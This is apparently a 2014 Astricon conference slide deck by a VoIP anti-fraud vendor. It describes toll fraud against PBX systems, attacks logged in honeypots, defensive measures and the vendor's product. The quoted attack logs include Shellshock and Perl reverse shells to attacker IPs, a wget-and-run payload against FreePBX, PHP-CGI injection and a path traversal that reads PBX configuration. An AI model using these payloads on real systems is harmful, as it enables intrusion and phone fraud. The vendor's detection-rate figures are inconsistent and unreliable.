No More Fraud, Astricon, Las Vegas 2014

No More Fraud!
Let’s say “enough is enough”

About me
Flavio E. Goncalves
CTO of SipPulse (www.sippulse.com)
Turnkey solutions for VoIP providers and Telcos.
Anti-Fraud Solutions

Why you should care?
Exposure for a single T1 line
43200 min/month, US$5/min, 23 lines
US$ 4.968.000

Why they are doing?
#1 Allocate a number and a
recording in a PRN provider
#2 Find a vulnerable device
Using shodan
#3 Make calls
and cash your money

INTELLIGENCE GRABBED IN
HONEYPOTS

Distribution by country
117636
105603
78656
32795
11910 11120 10702 3736 2836 1978
US FR DE PS RU TW SC SG GB CA

TOP Prefixes
+972 Palestine
+44 Great Britain
+86 China
+20 Egypt

TOP 5 PBX Exploits in
September/October
1. Shellshock
2. PHP/LAMP Injection
3. SQL injection in Trixbox
4. Linksys remote code execution
5. FreePBX Remote Code Execution

#1 Shellshock
• Exploit Date: 09/2014
Specimen:
• [26/Sep/2014:13:13:57 +0000] "GET / HTTP/1.0" 200
414 "-" "() { :;}; /bin/bash -c '/bin/bash -i >&
/dev/tcp/195.225.34.14/3333 0>&1'"
• [26/Sep/2014:13:16:54 +0000] "GET /cgi-sys/
defaultwebpage.cgi HTTP/1.0" 404 507 "-" "() { :;};
/bin/bash -c '/bin/bash -i >&
/dev/tcp/195.225.34.14/3333 0>&1'"

#2 SQL injection in Trixbox
• Exploit Date: 03/2014 - http://www.exploit-db.
com/exploits/32239/
Specimen:
• [25/Sep/2014:23:52:29 +0000] "GET /web-meetme/
conf_cdr.php?bookId=1 HTTP/1.1" 404 485 "-"
"curl/7.19.7 (x86_64-redhat-linux-gnu) libcurl/7.19.7
NSS/3.15.3 zlib/1.2.3 libidn/1.18 libssh2/1.4.2"

#3 Linksys Remote Code Execution
• Exploit Date: 02/2014 - http://www.exploit-db.
com/exploits/31683/
Specimen:
• [25/Sep/2014:12:50:16 +0000] "GET
/tmUnblock.cgi HTTP/1.1" 400 538 "-" "-"

#4 LAMP Attacks
• Apache/PHP Remote Exploit
• Exploit date 10/2013
• Especimen:
• POST /cgi-bin/php5?-d allow_url_include=on -d safe_mode=off -d
suhosin.simulation=on -d disable_functions="" -d
open_basedir=none -d auto_prepend_file=php://input -d
cgi.force_redirect=0 -d cgi.redirect_status_env=0 -n
• [26/Sep/2014:15:43:38 +0000] "POST /cgi-bin/
php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61
%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%6
9%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D
%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%7
0%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%7
2%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%
73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1" 404 492 "-" "Mozilla/5.0 (iPad; CPU OS 6_0 like
Mac OS X) AppleWebKit/536.26(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25“

#5 CallMeNum (Demo)
• Exploit date: 03/2012
• Specimen:
• GET
/recordings/misc/callme_page.php?action=c&callmenum=888
@ext-featurecodes/n
• Application: system
• Data: perl -MIO -e '$p=fork;exit,if($p); $c=new
IO::Socket::INET(PeerAddr,��x.y.z.w:4446"); STDIN-
>fdopen($c,r); $~->fdopen($c,w); $c-
>write("]QAfH#.Eqncmpn"); system$_ while<>;'

Unknown Exploits
• Jul/2014
• Specimen:
[03/Jul/2014] "GET
/recordings/locale/sv_SE/LC_MESSAGES/LC/index.php
[03/Jul/2014] "GET /fuxkkk.php
[03/Jul/2014] "GET /recordings/theme/alexpass.php

Still uncommon
• MANAGER PORT - 5038
• H323 - 1720
• MGCP – 5036
• TFTP – 69
• IAX2 - 4569

How hackers are getting into your PBX
• #1 – Sip Brute Force (Fail2ban is effective)
• #2 – Http Exploitation
• #3 – Attacks to phones
• #4 – Caller ID Spoofing
• #5 – Billing/Credit card frauds

Part – III How to defend
#1 Patching Everything and Upgrade
frequently
#2 Use a Firewall
#3 Use a Session Border Controller
#4 Use Encryption
#5 Use an Anti-Fraud System

#1 Patch Everything,
update frequently
• Effectiveness:
Low
• Risk: High
• Cost: High

#2 Use a Firewall or configure properly
IP tables
• Effectiveness: High
• Risk: Medium
• Cost: Low
• Absolutely a must do. At
least, no Internet access to
SSH, no Internet access to
HTTP/HTTPS.
• No prevention for phones
attacks

#3 Use a Session Border Controller
• Effectiveness: Medium
• Risk: Medium
• Cost: Very High

#4 Use encryption
• Effectiveness: Medium
•Risk: Medium
•Cost: High if you intend to do mutual
authentication

#5 Use an AntiFraud System
• Effectiveness: High
• Risk: Very Low
• Cost: Medium
• Comments: Can detect 99.999% of the
attacks, It prevents against caller ID
spoofing, Social Engineering and Phone
Attacks.
• Limitations: Firewall restrictions are required
to avoid tampering the anti-fraud rules.

Working Together in 2 steps
1. Make sure your customer’s
firewall and fail2ban is
configured right (You)
2. Partner with us to use TFPS on
your customers (Us)

Fraud Prevention for All
www.tfps.co

How effective it is an Anti-Fraud Solution
•99.989% just by
protocol signature.
• Number obtained
comparing the
attacks registered on
the honeypot against
rules.
Anti-Fraud Effectiveness
Detected Undetected

www.tfps.co || tfps.sippulse.com
1. 99.89% of the attacks prevented by
signature detection
2. Collaborative protection. One PBX
hacked automatically blocks the IP for
the others
3. Mechanism, SIP Redirect
•No additional hardware required.
•Available for
OpenSIPS/Freeswitch/Asterisk

Asterisk Code
[from-internal] ; Set there the context for your users
;FPS for International Calls
exten=_011[1-9].,1,set(ip=${CHANNEL(recvip)})
same=>n,SIPAddHeader(P-Received: ${ip})
same=>n,set(ua=${CHANNEL(useragent)})
same=>n,SIPAddHeader(P-UA: ${ua})
same=>n,set(GROUP()=fps)
same=>n,set(ncalls=${GROUP_COUNT(fps)})
same=>n,SIPAddHeader(P-Calls: ${ncalls})
same=>n,set(_original=${EXTEN})
same=>n,dial(SIP/fps/${EXTEN:2})

Asterisk Code
[fps]
;For calls not approved
exten=_R.,1,Answer()
same=>n,playback(unauthorized); (Customize here to generate an
error message)
same=>n,hangup(21)
;For calls approved
exten=_A.,1,Answer()
same=>n,Dial(SIP/provider/${original});(Customize here to send the
call ahead)
same=>n,hangup(16)

Comparing to other anti-fraud solutions!
• Pluggable
• No Additional Hardware
• Small traffic to be analyzed
• Small risk, only a few calls can be affected.
• Easy handling of outages

Thank You!
• e-mail: flavio@sippulse.com
• skype: flaviogoncalves1
• Twitter: @asteriskguide
• blog.tfps.co

#6 FreePBX 2.x Code Execution
• Specimen:
• [03/Jul/2014:17:28:41 +0000] "GET
• /admin/config.php?display=auth&handler=api&func
tion=system&args=cd%20/tmp;rm%20-
f%20e;wget%20http://93.170.130.201:3003/e;perl%
20e;rm%20-f%20e HTTP/1.1" 404 534 "-" "-"

#4 VTIGER Exploit (Lots of variations)
• 0001189: Vtiger CRM - php inject vulnerability
• Specimen
• 108.175.157.211 - - [25/Jul/2014:19:28:59 +0000] "GET
/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?mo
dule_name=../../../../../../../..//etc/amportal.conf%00 HTTP/1.1"
404 574 "-" "-“
• 93.170.130.201 - - [03/Jul/2014:21:15:11 +0000] "POST
/vtigercrm/graph.php?module=..%2Fmodules%2FSettings&action=
savewordtemplate HTTP/1.1" 404 537 "-" "-"

#4 PHP Code Injection Vulnerability
• Specimen:
• [03/Jul/2014:13:57:37 +0000] "GET
/admin/footer.php?php=info&ip=perl%20-MIO%20-
e%20%27%24p%3Dfork%3Bexit%2Cif(%24p)%3B%20%24c%3
Dnew%20IO%3A%3ASocket%3A%3AINET(PeerAddr%2C%22
93.170.130.201%3A3333%22)%3B%20STDIN-
%3Efdopen(%24c%2Cr)%3B%20%24~-
%3Efdopen(%24c%2Cw)%3B%20%24c-
%3Ewrite(%22%5DQAfH%23.Eq%5Cnunk%5Cn%22)%3B%20s
ystem%24_%20while%3C%3E%3B%27 HTTP/1.1" 404 534
"-" "-“
• "GET /admin/footer.php?php=info&ip=perl -MIO -e
'$p=fork;exit,if($p); $c=new
IO::Socket::INET(PeerAddr,"93.170.130.201:3333");
STDIN->fdopen($c,r); $~->fdopen($c,w); $c-
>write("]QAfH#.Eqnunkn"); system$_ while<>;'

#9 FreePBX Extension Dump
Exploitation
• Specimen:
• 184.105.240.203 - - [08/Jul/2014:01:33:42
+0000] "POST /admin/cdr/call-log.
php?handler=cdr&s=&t=&order=calldate
&sens=DESC&current_page=0/admin/cdr/ca
ll-comp.php HTTP/1.1" 404 484 "-" "-"

#6 Freeswitch Attacks
GET /freeswitch/app/provision/index.php?mac=df-df-df-df-df-
df&template=linksys

#4 Caller ID Spoofing
• 1 - Send 1 million calls and cancel
• 2 - Fake the callerID to a PRN
• 3 - Wait for the call back.

Open Source is a Target!
•We are seeing scans for:
• Vicidial
• Astpp
• phpMyAdmin (hot)
• Tomcat
• Jboss
• FreeSwitch

First way to protect
1.Make sure your system is protected by a
firewall
1. Vulnerability SCAN
2. Apply firewall rules to prevent unauthorized
access to the server
3. Use .htaccess and implement dual authentication

# 5 SIP Phone Recent Vulnerabilities
• Cisco 3905 - http://www.cvedetails.com/cve/CVE-2014-0721/
(10)
• Cisco SPA 3XX, 5XX http://www.cvedetails.com/cve/CVE-2014-
3313/ (4.3)
• Cisco SPA 3XX, 5XX http://www.cvedetails.com/cve/CVE-2014-
3312/ (6.9)
• Yealink - http://www.cvedetails.com/cve/CVE-2014-3427
• Yealink - http://www.cvedetails.com/cve/CVE-2014-3428/

No More Fraud, Astricon, Las Vegas 2014

More Related Content

No More Fraud, Astricon, Las Vegas 2014

Editor's Notes